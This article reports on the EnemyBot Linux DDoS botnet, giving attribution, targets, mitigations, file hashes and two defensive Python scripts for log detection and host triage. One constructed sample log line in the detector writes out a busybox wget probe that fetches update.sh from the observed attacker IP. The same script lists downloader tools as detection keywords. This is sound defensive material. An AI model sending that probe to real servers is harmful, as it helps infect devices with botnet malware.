A group of researchers has recently identified EnemyBot, a brand new Linux-based botnet. At first look, the DDoS-based botnet is seen causing infections across a large range of devices and platforms. The initial infection was seen making a drive-by attempt to /shell on a web server with an interesting payload attached to the “value” string. The researchers also saw several attempts to download an “update.sh” file using different methods: wget, busybox, and curl.
The Responsible Attacker Group “Keksec”
The botnet appears to be the work of “Keksec”, a group of cybercriminals with expertise in DDoS attacks and cryptocurrency mining. Keksec is tagged to over 400 malware samples. The group (also known as Nero and Freakout) is using the fast-evolving Enemybot to target routers from vendors like Seowon Intech and D-Link, and is exploiting a remote code execution (RCE) vulnerability (CVE-2022-27226) discovered last month in iRZ mobile routers. The group’s malware, ‘Enemybot’, is also said to be impacting Fortinet devices. The group is also known for deploying Distributed Denial-of-Service (DDoS) and cryptomining attacks, especially those based on the Linux-based Gafgyt source, among others.
The “Enemybot” Malware
Enemybot, like most botnets, targets multiple architectures to improve its chances of infecting devices; beyond IoT devices, it has been designed to target desktop and server architectures such as BSD, macOS, Arm and x86. The malware also uses a range of obfuscation methods to make it harder to analyze and to hide it from other botnets. In addition, it connects to a Command-and-Control (C2) server hidden in the Tor network, which increases its anonymity and makes it harder to take down. Once a device is compromised, Enemybot drops a file at /tmp/.pwned that contains a message pointing to ‘Keksec’ as the attacker. Many further iterations and variants of the attack vector have been noticed in the recent pattern.
“This mix of exploits targeting web servers and applications beyond the usual IoT devices, coupled with the wide range of supported architectures, might be a sign of Keksec testing the viability of expanding the botnet beyond low-resource IoT devices for more than just DDoS attacks. Based on their previous botnet operations, using them for cryptomining is a big possibility,” said Fortinet, which is reporting on the malware.
The Way Forward
The EnemyBot malware appears to follow structures and patterns similar to those seen in other common botnets, with a few changes. There appears to be a strong correlation with the LolFMe botnet, which contains similar strings such as “watudoinglookingatdis”. The LolFMe botnet was quite short-lived and never popular, so it will be interesting to see how far off the ground this particular strain gets. The malware has been noticed to have been built using the source code of the Gafgyt (Bashlite) botnet, which leaked in 2015, with some modules borrowed from the infamous Mirai botnet, including the scanner module and a bot killer module.
Both LolFMe and Mirai botnets leverage multi-architecture support and RCE as the initial foothold. This was also the case for EnemyBot.
Mitigation Recommendations
Securonix (https://www.securonix.com/) has suggested a few mitigation and remediation measures:
Some possible actions are recommended that can potentially help proactively mitigate the impact of EnemyBot attacks on your network.
- Ensure systems are fully patched and not vulnerable to RCE
- Patch IoT devices’ firmware to the latest versions to mitigate external exploitation
- Employ layer-7 network monitoring and detection to detect common exploits that may leverage RCE
- Ensure that externally exposed network segments are isolated from internal hosts
- Disable or limit execution from Linux /tmp/ directories
IP Communication observed: 198.12.116.254
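The layer-7 monitoring recommended above can be started from the web-server access log, using the probe characteristics the report itself gives: a request to /shell carrying a “value” parameter, a wget, busybox or curl fetch of update.sh, and the observed IP 198.12.116.254. The following is an added example written for this page, not code from the original report, Fortinet or Securonix. The log lines are constructed (RFC 5737 source addresses, a redacted placeholder instead of the real payload), and the assumption that update.sh is fetched from the observed IP is the example's own, not a claim the report makes.

```python
"""Layer-7 detection of the EnemyBot web-server probes described in the report.

Added example for this page (not the report's code). It parses combined-log-
format access lines and flags three things the report names: the /shell
"value" probe, downloader commands fetching update.sh, and the observed IP.
"""
import re
from urllib.parse import unquote

# Combined/common log format: src ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
DOWNLOADERS = ("wget", "curl", "busybox")   # fetch methods named in the report
OBSERVED_IP = "198.12.116.254"              # IP communication observed (from the report)

# Constructed sample log; the /shell payload is replaced by a placeholder and the
# update.sh hosting location is an assumption made for this example only.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2022:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Apr/2022:12:00:02 +0000] "POST /shell?value=REDACTED HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.9 - - [10/Apr/2022:12:00:03 +0000] '
    '"GET /shell?value=busybox%20wget%20http://198.12.116.254/update.sh HTTP/1.1" 404 0 "-" "-"',
]


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(target):
    """List the EnemyBot indicators present in a request target (path + query)."""
    decoded = unquote(target)            # %20 etc. hide the command words otherwise
    path, _, query = decoded.partition("?")
    lowered = decoded.lower()
    reasons = []
    if path == "/shell" and "value=" in query:
        reasons.append("shell-value-probe")
    if "update.sh" in lowered and any(tool in lowered for tool in DOWNLOADERS):
        reasons.append("update.sh-downloader")
    if OBSERVED_IP in lowered:
        reasons.append("observed-ip")
    return reasons


def classify_request(line):
    """None for unparseable lines, otherwise the (possibly empty) reason list."""
    rec = parse_line(line)
    return None if rec is None else reasons_for(rec["target"])


def scan_log(lines):
    """Return (source_ip, raw_target, reasons) for every line that matches an indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                     # unparseable line: skip rather than abort the scan
        reasons = reasons_for(rec["target"])
        if reasons:
            hits.append((rec["src"], rec["target"], reasons))
    return hits


if __name__ == "__main__":
    for src, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{src} {target} -> {', '.join(reasons)}")
```

Feed a real log with `scan_log(open("/var/log/nginx/access.log"))`; the match on the decoded target is deliberate, since the downloader words in the third sample line are only visible after URL decoding.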
Detection and Indicators of Compromise (IoCs):

| File Name | sha256 |
| --- | --- |
| update.sh | cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723 |
| enemybotarm | 52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf |
| enemybotarm | adb51a8d112590a6fdd02ac8d812b837bbe0fcdd762dba6bbba0bd0b538f9aef |
| enemybotarm5 | 498ecf2ce03960a695d4ba92d4d2e6163917686db29393c4b8d8c9d11d19774d |
| enemybotarm5 | 5e56210f15b653e4ea881f25bfa423af4f4c5ee3a7c9386543fde23e0e7169c8 |
| enemybotarm7 | 7ccffe7a3daa58db665db93f816ab0b5a4e9ce0bc7a2490d885250d267ed4bbc |
| enemybotarm7 | 7635758818ca966288ad10fb3d385c177f8cd5554369eeb28f8b52951004ed89 |
| enemyboti586 | f3c4ca5ba23d27a4d297dfef8614b48bbaca6455814d537114f4e6d418f10f47 |
| enemyboti586 | d9204c9b5018a3028d5c7f966d8c37be9d7d4dd2c5c4cd95cde686cce655c609 |
| enemyboti686 | ae9cc1b644ee435bddc57af2eeab05fb0ba0dc2f81473611bd2f39c1d9be1d1c |
| enemyboti686 | d0b9e7bbf034e501872ecb276b3b670ae175fff09618d9836356d47f677bdbbc |
| enemybotm68k | 5dba7e81c4a03eedee4a33535cfda88d8d178658d0e434ee48bd29d7091c63b5 |
| enemybotm68k | e4bdf0d87db133824ff183c28c860c08794394eaaf76898899cbeb5f9749ae1f |
| enemybotmips | 22db83f9cc631eb3222444328289a3be787c3a8182ccd8004c6cc2b5dc50a12d |
| enemybotmips | aeb9f6999fdc3a3dadbe93ff8a1a2de3ac181b43eddcf208c018db88526b5314 |
| enemybotmpsl | c275a1ec95142b7134d7beb153e6126bda9087c152e69497f1990c39d5045399 |
| enemybotmpsl | 6dbb0e96180d0946ddd9ff17908cf830fbff5016ff013891e3fdf3c3b33ef2e6 |
| enemybotppc | ea2ff0c01629bdaecceecc59d93de73f01b7b18146986be114503c086fa29976 |
| enemybotppc | 7ec1fab277b86e022819c9b5a53be05df2af76c5c19b2aa1cf26590d06dcdbcd |
| enemybotppc-440fp | 908a95c887d4c46e5058db09e85efba023219793b54b5cd7ea03e1b450784111 |
| enemybotppc-440fp | a33145dc629c7ca76dc5ec0138fe60b06e8c53bd01f1bb90d9a7e21ff0a391e6 |
| enemybotsh4 | 9bb46cfa321d5aa65960fa4563a50eec40de4e221e360162bae4b4e4b40a3540 |
| enemybotsh4 | 058d36172d25e7b3db227c02ffba5be3d1b17d0eef7bfd4029c55b16ac2ab06b |
| enemybotspc | f36ade94ba4261fdff37d53c7d7c4935374d9263ec4fe92d2bb6c1def5f0783f |
| enemybotspc | b2c92609557eaabe108689a17996befeabb48da70053ae6335a1fcd0c1189249 |
| enemybotx86 | 1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50 |
| enemybotx86 | 12e907fae4427a7b0d68adfb33a5e045971bd755f8b7a48299a27736c24c9929 |
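A host-side triage script ties the indicators above to two other points in the report: the /tmp/.pwned marker the malware drops and the recommendation to limit execution from /tmp. The following is an added example written for this page, not code from the original report, Fortinet or Securonix. The hash set is transcribed from the table above; the /proc/mounts text in the test and the choice to treat a /tmp that is not a separate mount as "not enforced" are this example's own assumptions.

```python
"""Host-side IoC triage for the EnemyBot indicators listed in the report.

Added example for this page (not the report's code). It hashes files under a
directory and matches them against the published SHA-256 values, checks for
the /tmp/.pwned marker the report describes, and verifies that /tmp is
mounted noexec as the mitigation list recommends.
"""
import hashlib
import os

# SHA-256 -> file name, transcribed from the indicator table in the report.
ENEMYBOT_SHA256 = {
    "cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723": "update.sh",
    "52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf": "enemybotarm",
    "adb51a8d112590a6fdd02ac8d812b837bbe0fcdd762dba6bbba0bd0b538f9aef": "enemybotarm",
    "498ecf2ce03960a695d4ba92d4d2e6163917686db29393c4b8d8c9d11d19774d": "enemybotarm5",
    "5e56210f15b653e4ea881f25bfa423af4f4c5ee3a7c9386543fde23e0e7169c8": "enemybotarm5",
    "7ccffe7a3daa58db665db93f816ab0b5a4e9ce0bc7a2490d885250d267ed4bbc": "enemybotarm7",
    "7635758818ca966288ad10fb3d385c177f8cd5554369eeb28f8b52951004ed89": "enemybotarm7",
    "f3c4ca5ba23d27a4d297dfef8614b48bbaca6455814d537114f4e6d418f10f47": "enemyboti586",
    "d9204c9b5018a3028d5c7f966d8c37be9d7d4dd2c5c4cd95cde686cce655c609": "enemyboti586",
    "ae9cc1b644ee435bddc57af2eeab05fb0ba0dc2f81473611bd2f39c1d9be1d1c": "enemyboti686",
    "d0b9e7bbf034e501872ecb276b3b670ae175fff09618d9836356d47f677bdbbc": "enemyboti686",
    "5dba7e81c4a03eedee4a33535cfda88d8d178658d0e434ee48bd29d7091c63b5": "enemybotm68k",
    "e4bdf0d87db133824ff183c28c860c08794394eaaf76898899cbeb5f9749ae1f": "enemybotm68k",
    "22db83f9cc631eb3222444328289a3be787c3a8182ccd8004c6cc2b5dc50a12d": "enemybotmips",
    "aeb9f6999fdc3a3dadbe93ff8a1a2de3ac181b43eddcf208c018db88526b5314": "enemybotmips",
    "c275a1ec95142b7134d7beb153e6126bda9087c152e69497f1990c39d5045399": "enemybotmpsl",
    "6dbb0e96180d0946ddd9ff17908cf830fbff5016ff013891e3fdf3c3b33ef2e6": "enemybotmpsl",
    "ea2ff0c01629bdaecceecc59d93de73f01b7b18146986be114503c086fa29976": "enemybotppc",
    "7ec1fab277b86e022819c9b5a53be05df2af76c5c19b2aa1cf26590d06dcdbcd": "enemybotppc",
    "908a95c887d4c46e5058db09e85efba023219793b54b5cd7ea03e1b450784111": "enemybotppc-440fp",
    "a33145dc629c7ca76dc5ec0138fe60b06e8c53bd01f1bb90d9a7e21ff0a391e6": "enemybotppc-440fp",
    "9bb46cfa321d5aa65960fa4563a50eec40de4e221e360162bae4b4e4b40a3540": "enemybotsh4",
    "058d36172d25e7b3db227c02ffba5be3d1b17d0eef7bfd4029c55b16ac2ab06b": "enemybotsh4",
    "f36ade94ba4261fdff37d53c7d7c4935374d9263ec4fe92d2bb6c1def5f0783f": "enemybotspc",
    "b2c92609557eaabe108689a17996befeabb48da70053ae6335a1fcd0c1189249": "enemybotspc",
    "1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50": "enemybotx86",
    "12e907fae4427a7b0d68adfb33a5e045971bd755f8b7a48299a27736c24c9929": "enemybotx86",
}
MARKER_PATH = "/tmp/.pwned"   # marker file named in the report


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large samples do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def match_hashes(hash_by_path):
    """Return [(path, indicator_name)] for each path whose SHA-256 is a listed IoC."""
    return [(p, ENEMYBOT_SHA256[h.lower()])
            for p, h in hash_by_path.items() if h.lower() in ENEMYBOT_SHA256]


def scan_directory(root):
    """Hash every regular file under root (symlinks skipped) and match against the IoCs."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.isfile(path) and not os.path.islink(path):
                    hashes[path] = sha256_file(path)
            except OSError:
                continue   # unreadable or vanished file: skip it, do not abort the scan
    return match_hashes(hashes)


def tmp_is_noexec(mounts_text, mount_point="/tmp"):
    """Parse /proc/mounts-style text; True only if mount_point carries the noexec option.

    Assumption made here: a /tmp that is not its own mount inherits the root
    filesystem's options, so it is reported as not enforced.
    """
    for line in mounts_text.splitlines():
        fields = line.split()   # device mountpoint fstype options dump pass
        if len(fields) >= 4 and fields[1] == mount_point:
            return "noexec" in fields[3].split(",")
    return False


def marker_present(path=MARKER_PATH):
    return os.path.exists(path)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/tmp"
    for path, name in scan_directory(root):
        print(f"IoC match: {path} ({name})")
    print("marker /tmp/.pwned present:", marker_present())
    with open("/proc/mounts") as f:
        print("/tmp mounted noexec:", tmp_is_noexec(f.read()))
```

Run it as `python3 triage.py /tmp` on a suspect host; a hash match or the marker file is a confirmed indicator, while a `False` from `tmp_is_noexec` only means the mitigation in the list above is not in place, not that the host is infected.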